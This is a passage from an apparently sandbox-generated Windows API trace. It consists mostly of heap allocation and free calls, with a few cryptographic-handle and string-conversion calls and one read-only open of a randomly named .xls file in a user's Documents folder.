(HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafd0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0079.401] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadc0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0079.401] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0079.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e88 [0079.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.402] CryptDestroyHash (hHash=0x41ac500) returned 1 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0079.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0079.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0079.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0079.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0079.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0079.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0079.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.404] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0079.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0079.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0079.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0079.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.409] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0079.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0079.409] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0079.410] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0079.410] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.410] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ivmtcxmhjdptt31p9ocd.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0079.410] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.411] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0079.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.411] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0079.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0079.411] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0079.411] PeekMessageW (in: 